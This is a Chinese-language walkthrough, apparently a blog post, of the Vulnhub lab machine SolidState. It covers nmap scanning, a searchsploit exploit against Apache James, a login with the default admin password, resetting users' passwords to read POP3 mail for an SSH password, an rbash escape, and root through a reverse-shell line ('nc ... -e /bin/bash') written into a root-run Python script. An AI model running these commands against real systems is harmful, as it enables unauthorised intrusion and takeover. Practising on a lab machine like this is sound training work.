目录
一、nmap扫描
nmap -sT --min-rate 10000 192.168.213.141 -oA nmapscan/port
扫描tcp开放了那些端口,保存到nmap/port中
nmap -sU --min-rate 10000 192.168.213.141 -oA nmapscan/port
扫描udp开放了那些端口,保存到nmap/udp中
nmap -sT -sC -Pn -v -sV -O 192.168.213.141 -oA nmapscan/detail
对开放的端口进行详细的探测,保存到detail中
nmap --script=vuln 192.168.213.141 nmapscan/vuln
使用nmap的漏洞扫描脚本进行漏洞扫描
二、pop3泄露的ssh密码登录ssh,并rbash逃逸
通过nmap扫描发现,25,110,119,4555端口都有一个关键词“JAMES”,使用searchsploit进行搜索 searchsploit james
searchsploit -m 50347
根据说明构造语句
python 50347.py 192.168.213.141 192.168.213.128 8888
nc -lvnp 8888
发现不能直接getshell
但是在py脚本里发现了james-admin默认密码
之前用nmap进行端口扫描的时候,知道了4555端口是james-admin 服务
telnet 192.168.213.141 4555 成功登录
列出来用户,有一个命令是setpassword,对列出的用户修改密码,目的看看那个用户能登录pop3
登录pop3 telnet 192.168.213.141 110
在mindy 用户发现接收的邮件
stat 看是否有邮件
list 列出有几封,并写出长度
top 1 1109 看第一封邮件,长度为1109
在第二封邮件发现ssh密码
ssh登录 ssh mindy@192.168.213.141
发现是rbash,进行rbash逃逸
ssh mindy@192.168.213.141 "export TERM=xterm;python -c 'import pty;pty.spawn(\"/bin/bash\")'"
三、root权限脚本反弹shell提权
sudo提权X
内核提权X (可以看出靶机作者并不想考怎么进行内核提权)
自动任务提权X
SUID Polkit提权X
systemd-run -t /bin/bash
使用CVE-2021-4034进行提权,也是不行
ps -aux | grep james
发现一个以root权限执行的py脚本,反弹shell获得root权限
echo 'import os; os.system("/bin/nc 192.168.213.128 443 -e /bin/bash")' > /opt/tmp.py
nc -lvnp 443
提权成功,
四、总结
通过James-admin的默认密码登录后,修改所有用户的密码后,登录pop3发现邮件里面的ssh密码,登录并进行rbash逃逸,最后使用root执行的py文件进行提权。
标签:登录,213.141,nmap,打靶,192.168,提权,SolidState,Vulnhub,ssh From: https://blog.csdn.net/a2FpX2tr/article/details/144700708